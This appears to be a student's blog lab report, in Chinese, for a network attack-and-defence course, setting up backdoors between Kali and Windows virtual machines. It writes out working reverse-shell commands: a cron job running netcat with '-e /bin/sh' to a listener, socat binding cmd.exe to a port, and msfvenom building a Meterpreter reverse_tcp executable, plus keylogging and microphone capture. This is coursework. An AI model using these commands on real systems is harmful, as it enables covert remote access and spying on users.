20155330 《网络对抗》 Exp2 后门原理与实践

20155330 《网络对抗》 实验二 后门原理与实践

基础问题回答

  1. 例举你能想到的一个后门进入到你系统中的可能方式?

    在网站上下载非官方软件,所下载的软件中携带伪装过的后门程序。

  2. 例举你知道的后门如何启动起来(win及linux)的方式?

    将后门程序伪装为被启动项目。

  3. Meterpreter有哪些给你映像深刻的功能?

    记录音频、获取入侵主机权限。

  4. 如何发现自己有系统有没有被安装后门?

    使用杀毒软件进行查杀。

实验内容

  1. 使用netcat获取主机操作Shell,cron启动
  2. 使用socat获取主机操作Shell, 任务计划启动
  3. 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
  4. 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

常用后门工具

准备工作

  1. 打开cmd,输入ipconfig获取windows系统的IP地址和相关信息。
    • win10系统IP:192.168.43.248
    • win7系统IP:192.168.204.135
  2. 打开终端,输入ifconfig -a获取Kali的IP地址和相关信息。

Win获得Linux Shell

以下实践Windows基于Win10-64bit, Kali2-64bit.

  1. windows 打开监听

  1. Linux反弹连接win

  1. windows下获得一个linux shell,可运行任何指令,如ls

Linux获得Win Shell

以下实践Windows基于Win7-64bit, Kali2-64bit.(后同)

1.Linux运行监听指令

2.Windows反弹连接Linux

3.Linux下看到Windows的命令提示

nc传输数据

在win7的cmd中使用ncat.exe -l 5330监听端口,Kali中使用nc win7主机IP 5330连接win7系统输入数据,在win7同步显示。

使用netcat获取主机操作Shell,cron启动
  1. 在windows系统下监听5330端口
  2. crontab -e指令编辑一条定时任务(使用VIM编辑器编辑),在最后一行添加43 * * * * /bin/netcat 192.168.1.200 5215 -e /bin/sh(时间设置在Kali系统当前时间的后一分钟)
  3. 时间到43分时,windows系统获得Kali的shell,在cmd中输入命令whoami得到结果
SoCat
  1. 在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器
  2. 在操作->程序/脚本中选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:5330 exec:cmd.exe,pty,stderr(作用:把cmd.exe绑定到端口5215,同时将cmd.exe的stderr重定向到stdout)
  3. 在Kali环境下输入指令socat - tcp:192.168.204.135:5330,第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5330端口,此时可成功获得cmd shell

2.2 Meterpreter

生成20155330_backdoor.exe,复制到Win

  1. 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.204.135 LPORT=5330 -f exe > 20155330_backdoor.exe生成后门程序



  1. 通过nc指令将生成的后门程序传送到Windows主机上
  • 参数说明:

    参数 相关说明
    -p 使用的payload。windows/meterpreter/reverse_tcp相当于shellcode。
    -x 使用的可执行文件模板,payload(shellcode)写入到该可执行文件中。
    -e 使用的编码器,用于对shellcode变形,为了免杀。
    -i 编码器的迭代次数。
    -b badchar是payload中需要去除的字符。
    LHOST 是反弹回连的IP
    LPORT 是回连的端口
    -f 生成文件的类型
    > 输出到哪个文件

MSF打开监听进程

  1. 打开msfconsole
  2. 输入use exploit/multi/handler进行侦听,并设置相关参数.
  3. 设置完成后,执行监听。Linux平台的监听进程将获得Win主机的主动连接,并得到远程控制shell

Meterpreter常用功能

  1. 使用record_mic截获一段音频
  2. 使用screenshot截屏
  3. 使用keyscan_start指令记录击键的过程,使用keyscan_dump指令读取击键的记录
  4. 使用getuid指令查看当前用户

实验体会

此次实验首先要保证Kali和windows系统主机能够通过网络相互连接,才能进行之后的步骤。实验中主要遇到的问题就是电脑的摄像头无法连接到虚拟机,甚至在本机上也经常出现错误,应该是开学初的强制更新过程中驱动出了问题。

posted @ 2018-04-03 14:06  20155330  阅读(135)  评论(0编辑  收藏  举报